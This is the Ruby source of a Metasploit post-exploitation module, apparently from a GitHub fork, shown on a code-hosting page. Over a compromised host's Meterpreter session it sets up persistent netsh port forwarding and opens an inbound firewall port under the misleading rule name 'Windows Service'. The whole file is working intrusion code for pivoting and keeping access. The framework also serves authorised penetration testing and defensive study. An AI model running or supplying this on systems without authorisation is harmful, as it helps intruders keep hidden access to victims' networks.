PageRenderTime 43ms CodeModel.GetById 17ms RepoModel.GetById 0ms app.codeStats 0ms

/modules/post/windows/manage/portproxy.rb

https://github.com/Jonono2/metasploit-framework
Ruby | 125 lines | 117 code | 4 blank | 4 comment | 1 complexity | c39340a170034e3a6831ef2b6fd3581e MD5 | raw file
Possible License(s): BSD-3-Clause, Apache-2.0, GPL-3.0, LGPL-2.1, GPL-2.0 
    

  1. ##
    2. 

  2. # This module requires Metasploit: http//metasploit.com/download
    3. 

  3. # Current source: https://github.com/rapid7/metasploit-framework
    4. 

  4. ##
    5. 

  5. 

  6. class Metasploit3 < Msf::Post
    7. 

  7.   include Msf::Post::Windows::Priv
    8. 

  8. 

  9.   def initialize(info={})
    10. 

  10.     super( update_info( info,
    11. 

  11.       'Name'          => 'Windows Manage Set Port Forwarding With PortProxy',
    12. 

  12.       'Description'   => %q{
    13. 

  13.         This module uses the PortProxy interface from netsh to set up
    14. 

  14.         port forwarding persistently (even after reboot). PortProxy
    15. 

  15.         supports TCP IPv4 and IPv6 connections.
    16. 

  16.       },
    17. 

  17.       'License'       => MSF_LICENSE,
    18. 

  18.       'Author'        => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
    19. 

  19.       'Platform'      => 'win',
    20. 

  20.       'SessionTypes'  => [ 'meterpreter' ]
    21. 

  21.     ))
    22. 

  22. 

  23.     register_options(
    24. 

  24.       [
    25. 

  25.         OptAddress.new('LOCAL_ADDRESS',   [ true, 'IPv4/IPv6 address to which to listen.']),
    26. 

  26.         OptAddress.new('CONNECT_ADDRESS', [ true, 'IPv4/IPv6 address to which to connect.']),
    27. 

  27.         OptPort.new(   'CONNECT_PORT',    [ true, 'Port number to which to connect.']),
    28. 

  28.         OptPort.new(   'LOCAL_PORT',      [ true, 'Port number to which to listen.']),
    29. 

  29.         OptBool.new(   'IPV6_XP',         [ true, 'Install IPv6 on Windows XP (needed for v4tov4).', true]),
    30. 

  30.         OptEnum.new(   'TYPE',            [ true, 'Type of forwarding', 'v4tov4', ['v4tov4','v6tov6','v6tov4','v4tov6']])
    31. 

  31.       ], self.class)
    32. 

  32.     end
    33. 

  33. 

  34.   def run
    35. 

  35.     if not is_admin?
    36. 

  36.       print_error("You don't have enough privileges. Try getsystem.")
    37. 

  37.       return
    38. 

  38.     end
    39. 

  39. 

  40.     # Due to a bug in Windows XP you need to install IPv6
    41. 

  41.     # http://support.microsoft.com/kb/555744/en-us
    42. 

  42.     if sysinfo["OS"] =~ /XP/
    43. 

  43.       return unless check_ipv6
    44. 

  44.     end
    45. 

  45. 

  46.     return unless enable_portproxy
    47. 

  47.     fw_enable_ports
    48. 

  48. 

  49.   end
    50. 

  50. 

  51.   def enable_portproxy
    52. 

  52.     rtable = Rex::Ui::Text::Table.new(
    53. 

  53.       'Header' => 'Port Forwarding Table',
    54. 

  54.       'Indent' =>  3,
    55. 

  55.       'Columns' => ['LOCAL IP', 'LOCAL PORT', 'REMOTE IP', 'REMOTE PORT']
    56. 

  56.     )
    57. 

  57. 

  58.     print_status("Setting PortProxy ...")
    59. 

  59.     netsh_args = "interface portproxy "
    60. 

  60.     netsh_args << "add #{datastore['TYPE']} "
    61. 

  61.     netsh_args << "listenport=#{datastore['LOCAL_PORT']} "
    62. 

  62.     netsh_args << "listenaddress=#{datastore['LOCAL_ADDRESS']} "
    63. 

  63.     netsh_args << "connectport=#{datastore['CONNECT_PORT']} "
    64. 

  64.     netsh_args << "connectaddress=#{datastore['CONNECT_ADDRESS']}"
    65. 

  65.     output = cmd_exec("netsh", netsh_args)
    66. 

  66.     if output.size > 2
    67. 

  67.       print_error("Setup error. Verify parameters and syntax.")
    68. 

  68.       return false
    69. 

  69.     else
    70. 

  70.       print_good("PortProxy added.")
    71. 

  71.     end
    72. 

  72. 

  73.     output = cmd_exec("netsh","interface portproxy show all")
    74. 

  74.     output.each_line do |l|
    75. 

  75.       rtable << l.split(" ") if l.strip =~ /^[0-9]|\*/
    76. 

  76.     end
    77. 

  77.     print_status(rtable.to_s)
    78. 

  78.     return true
    79. 

  79.   end
    80. 

  80. 

  81.   def ipv6_installed()
    82. 

  82.     output = cmd_exec("netsh","interface ipv6 show interface")
    83. 

  83.     if output.lines.count > 2
    84. 

  84.       return true
    85. 

  85.     else
    86. 

  86.       return false
    87. 

  87.     end
    88. 

  88.   end
    89. 

  89. 

  90.   def check_ipv6
    91. 

  91.     if ipv6_installed
    92. 

  92.       print_status("IPv6 is already installed.")
    93. 

  93.       return true
    94. 

  94.     elsif not datastore['IPV6_XP']
    95. 

  95.       print_error("IPv6 is not installed. You need IPv6 to use portproxy.")
    96. 

  96.       print_status("IPv6 can be installed with \"netsh interface ipv6 install\"")
    97. 

  97.       return false
    98. 

  98.     else
    99. 

  99.       print_status("Installing IPv6... can take a little long")
    100. 

  100.       cmd_exec("netsh","interface ipv6 install",120)
    101. 

  101.       if not ipv6_installed
    102. 

  102.         print_error("IPv6 was not successfully installed. Run it again.")
    103. 

  103.         return false
    104. 

  104.       end
    105. 

  105.       print_good("IPv6 was successfully installed.")
    106. 

  106.       return true
    107. 

  107.     end
    108. 

  108.   end
    109. 

  109. 

  110.   def fw_enable_ports
    111. 

  111.     print_status ("Setting port #{datastore['LOCAL_PORT']} in Windows Firewall ...")
    112. 

  112.     if sysinfo["OS"] =~ /Windows 7|Vista|2008|2012/
    113. 

  113.       cmd_exec("netsh","advfirewall firewall add rule name=\"Windows Service\" dir=in protocol=TCP action=allow localport=\"#{datastore['LOCAL_PORT']}\"")
    114. 

  114.     else
    115. 

  115.       cmd_exec("netsh","firewall set portopening protocol=TCP port=\"#{datastore['LOCAL_PORT']}\"")
    116. 

  116.     end
    117. 

  117.     output = cmd_exec("netsh","firewall show state")
    118. 

  118. 

  119.     if output =~ /^#{datastore['LOCAL_PORT']} /
    120. 

  120.       print_good("Port opened in Windows Firewall.")
    121. 

  121.     else
    122. 

  122.       print_error("There was an error enabling the port.")
    123. 

  123.     end
    124. 

  124.   end
    125. 

  125. end
    126. 

  126.